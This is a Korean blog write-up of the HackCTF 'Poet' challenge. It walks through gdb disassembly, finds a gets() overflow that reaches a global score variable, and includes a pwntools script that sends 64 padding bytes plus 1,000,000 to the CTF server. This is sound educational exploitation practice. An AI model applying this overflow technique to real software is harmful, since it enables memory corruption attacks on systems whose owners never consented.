시작
안녕하세요 :D
HackCTF 문제만 계속 풀고 있습니다 ㅎㅎ
너무 어렵게만 생각하는건지.. 풀고 보면 허무한 문제들이 많네요ㅠ
시작해보죠!!
Write UP
root@goorm:/workspace/LCH_Server/HackCTF/13.Poet# ./poet
**********************************************************
* 우리는 2018년의 시인(poet)을 찾고 있습니다. *
* 플래그상을 받고 싶다면 지금 한 줄의 시를 쓰세요! *
**********************************************************
Enter :
> aaaa
이 시의 저자는 누구입니까?
> bbbb
+---------------------------------------------------------------------------+
시 내용
aaaa
점수:0
음...이 시로는 충분하지가 않습니다.
정확히 1,000,000 점을 획득해야만 됩니다.
다시 시도해주세요!
+---------------------------------------------------------------------------+
Enter :
>
시 한 줄과 저자를 입력받습니다.
점수가 1,000,000점이어야 플래그상을 준다고 하네요.
gdb-peda$ pd main
Dump of assembler code for function main:
0x00000000004009cc <+0>: push rbp
0x00000000004009cd <+1>: mov rbp,rsp
0x00000000004009d0 <+4>: sub rsp,0x10
0x00000000004009d4 <+8>: mov DWORD PTR [rbp-0x4],edi
0x00000000004009d7 <+11>: mov QWORD PTR [rbp-0x10],rsi
0x00000000004009db <+15>: mov rax,QWORD PTR [rip+0x20169e] # 0x602080 <stdout@@GLIBC_2.2.5>
0x00000000004009e2 <+22>: mov ecx,0x0
0x00000000004009e7 <+27>: mov edx,0x2
0x00000000004009ec <+32>: mov esi,0x0
0x00000000004009f1 <+37>: mov rdi,rax
0x00000000004009f4 <+40>: call 0x4006a0 <setvbuf@plt>
0x00000000004009f9 <+45>: mov edi,0x400c68
0x00000000004009fe <+50>: call 0x400640 <puts@plt>
0x0000000000400a03 <+55>: mov eax,0x0
0x0000000000400a08 <+60>: call 0x400978 <get_poem>
0x0000000000400a0d <+65>: mov eax,0x0
0x0000000000400a12 <+70>: call 0x4009a7 <get_author>
0x0000000000400a17 <+75>: mov eax,0x0
0x0000000000400a1c <+80>: call 0x400844 <rate_poem>
0x0000000000400a21 <+85>: mov eax,DWORD PTR [rip+0x201ab9] # 0x6024e0 <poem+1088>
0x0000000000400a27 <+91>: cmp eax,0xf4240
0x0000000000400a2c <+96>: jne 0x400a3a <main+110>
0x0000000000400a2e <+98>: mov eax,0x0
0x0000000000400a33 <+103>: call 0x4007e6 <reward>
0x0000000000400a38 <+108>: jmp 0x400a03 <main+55>
0x0000000000400a3a <+110>: mov edi,0x400d78
0x0000000000400a3f <+115>: call 0x400640 <puts@plt>
0x0000000000400a44 <+120>: jmp 0x400a03 <main+55>
End of assembler dump.
main 함수입니다.
get_poem(), get_author(), reward() 함수를 지나네요. reward()에서 플래그를 떨궈줄 것 같죠?
gdb-peda$ pd rate_poem
Dump of assembler code for function rate_poem:
0x0000000000400844 <+0>: push rbp
0x0000000000400845 <+1>: mov rbp,rsp
0x0000000000400848 <+4>: sub rsp,0x410
0x000000000040084f <+11>: lea rax,[rbp-0x410]
0x0000000000400856 <+18>: mov esi,0x6020a0
0x000000000040085b <+23>: mov rdi,rax
0x000000000040085e <+26>: call 0x400630 <strcpy@plt>
0x0000000000400863 <+31>: lea rax,[rbp-0x410]
0x000000000040086a <+38>: mov esi,0x400b91
0x000000000040086f <+43>: mov rdi,rax
0x0000000000400872 <+46>: call 0x4006c0 <strtok@plt>
0x0000000000400877 <+51>: mov QWORD PTR [rbp-0x8],rax
0x000000000040087b <+55>: jmp 0x40094e <rate_poem+266>
0x0000000000400880 <+60>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000400884 <+64>: mov esi,0x400b94
0x0000000000400889 <+69>: mov rdi,rax
0x000000000040088c <+72>: call 0x400680 <strcmp@plt>
0x0000000000400891 <+77>: test eax,eax
0x0000000000400893 <+79>: je 0x40092c <rate_poem+232>
0x0000000000400899 <+85>: mov rax,QWORD PTR [rbp-0x8]
0x000000000040089d <+89>: mov esi,0x400b99
0x00000000004008a2 <+94>: mov rdi,rax
0x00000000004008a5 <+97>: call 0x400680 <strcmp@plt>
0x00000000004008aa <+102>: test eax,eax
0x00000000004008ac <+104>: je 0x40092c <rate_poem+232>
0x00000000004008ae <+106>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004008b2 <+110>: mov esi,0x400b9d
0x00000000004008b7 <+115>: mov rdi,rax
0x00000000004008ba <+118>: call 0x400680 <strcmp@plt>
0x00000000004008bf <+123>: test eax,eax
0x00000000004008c1 <+125>: je 0x40092c <rate_poem+232>
0x00000000004008c3 <+127>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004008c7 <+131>: mov esi,0x400ba3
0x00000000004008cc <+136>: mov rdi,rax
0x00000000004008cf <+139>: call 0x400680 <strcmp@plt>
0x00000000004008d4 <+144>: test eax,eax
0x00000000004008d6 <+146>: je 0x40092c <rate_poem+232>
0x00000000004008d8 <+148>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004008dc <+152>: mov esi,0x400ba7
0x00000000004008e1 <+157>: mov rdi,rax
0x00000000004008e4 <+160>: call 0x400680 <strcmp@plt>
0x00000000004008e9 <+165>: test eax,eax
0x00000000004008eb <+167>: je 0x40092c <rate_poem+232>
0x00000000004008ed <+169>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004008f1 <+173>: mov esi,0x400bae
0x00000000004008f6 <+178>: mov rdi,rax
0x00000000004008f9 <+181>: call 0x400680 <strcmp@plt>
0x00000000004008fe <+186>: test eax,eax
0x0000000000400900 <+188>: je 0x40092c <rate_poem+232>
0x0000000000400902 <+190>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000400906 <+194>: mov esi,0x400bb2
0x000000000040090b <+199>: mov rdi,rax
0x000000000040090e <+202>: call 0x400680 <strcmp@plt>
0x0000000000400913 <+207>: test eax,eax
0x0000000000400915 <+209>: je 0x40092c <rate_poem+232>
0x0000000000400917 <+211>: mov rax,QWORD PTR [rbp-0x8]
0x000000000040091b <+215>: mov esi,0x400bba
0x0000000000400920 <+220>: mov rdi,rax
0x0000000000400923 <+223>: call 0x400680 <strcmp@plt>
0x0000000000400928 <+228>: test eax,eax
0x000000000040092a <+230>: jne 0x40093b <rate_poem+247>
0x000000000040092c <+232>: mov eax,DWORD PTR [rip+0x201bae] # 0x6024e0 <poem+1088>
0x0000000000400932 <+238>: add eax,0x64
0x0000000000400935 <+241>: mov DWORD PTR [rip+0x201ba5],eax # 0x6024e0 <poem+1088>
0x000000000040093b <+247>: mov esi,0x400b91
0x0000000000400940 <+252>: mov edi,0x0
0x0000000000400945 <+257>: call 0x4006c0 <strtok@plt>
0x000000000040094a <+262>: mov QWORD PTR [rbp-0x8],rax
0x000000000040094e <+266>: cmp QWORD PTR [rbp-0x8],0x0
0x0000000000400953 <+271>: jne 0x400880 <rate_poem+60>
0x0000000000400959 <+277>: mov eax,DWORD PTR [rip+0x201b81] # 0x6024e0 <poem+1088>
0x000000000040095f <+283>: mov edx,eax
0x0000000000400961 <+285>: mov esi,0x6020a0
0x0000000000400966 <+290>: mov edi,0x400bc0
0x000000000040096b <+295>: mov eax,0x0
0x0000000000400970 <+300>: call 0x400650 <printf@plt>
0x0000000000400975 <+305>: nop
0x0000000000400976 <+306>: leave
0x0000000000400977 <+307>: ret
End of assembler dump.
rate_poem() 함수입니다.
strcmp()를 이용해서 문자열을 비교하는 구문이 많이 보이네요. 이 중 하나라도 같은 문자열이 있다면
rate_poem() + 232 부분으로 이동해서 0x6024e0 위치에 0x64만큼의 값을 더해줍니다.
딱 느낌이 오죠? 0x6024e0이 score 변수인 것 같네요. 이 친구를 백만으로 만들어 주어야 합니다.
gdb-peda$ pd get_author
Dump of assembler code for function get_author:
0x00000000004009a7 <+0>: push rbp
0x00000000004009a8 <+1>: mov rbp,rsp
0x00000000004009ab <+4>: mov edi,0x400c38
0x00000000004009b0 <+9>: mov eax,0x0
0x00000000004009b5 <+14>: call 0x400650 <printf@plt>
0x00000000004009ba <+19>: mov edi,0x6024a0
0x00000000004009bf <+24>: mov eax,0x0
0x00000000004009c4 <+29>: call 0x400690 <gets@plt>
0x00000000004009c9 <+34>: nop
0x00000000004009ca <+35>: pop rbp
0x00000000004009cb <+36>: ret
End of assembler dump.
get_author 함수입니다. 0x6024a0 위치부터 gets()로 받아요. BOF가 터지네요.
점수를 저장했던 0x6024e0과 64 bytes 차이가 납니다. 때문에 64 + 0xf4240(=1,000,000) 페이로드를 주면 플래그상을 받을 수 있을 것 같아요.
from pwn import *
#p = process("./poet")
p = remote("ctf.j0n9hyun.xyz", 3012)
context.log_level = "debug"
payload = ""
million = 0xf4240
p.recvuntil("> ")
p.sendline("AAAA")
p.recvuntil("> ")
payload += "B" * 64
payload += p32(million)
p.sendline(payload)
p.interactive()
[+] Opening connection to ctf.j0n9hyun.xyz on port 3012: Done
[*] Switching to interactive mode
+---------------------------------------------------------------------------+
시 내용
AAAA
점수:1000000
축하합니다!
시 내용
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
2018년 시인 상을 받았습니다!!
보상:
///flag!!
+---------------------------------------------------------------------------+
[*] Got EOF while reading in interactive
Exploit!!
마무리
처음엔 strcmp 부분으로 돌려서 점수 하나하나 쌓으려고 했는데 뭔가 이상하더라구요 ㅋㅋㅋㅋ
100점씩 주면서 백만 점을 모으라니.. 그래서 직접 변수를 건드렸던 문제입니다.
감사합니다 :D
'CTF_Write_UP > HackCTF' 카테고리의 다른 글
| [HackCTF] Random Key (0) | 2019.09.22 |
|---|---|
| [HackCTF] 1996 (0) | 2019.09.22 |
| [HackCTF] RTL_World (0) | 2019.09.19 |
| [HackCTF] Yes or no (0) | 2019.09.19 |
| [HackCTF] 1 ~ 9번 문제 (1) | 2019.09.18 |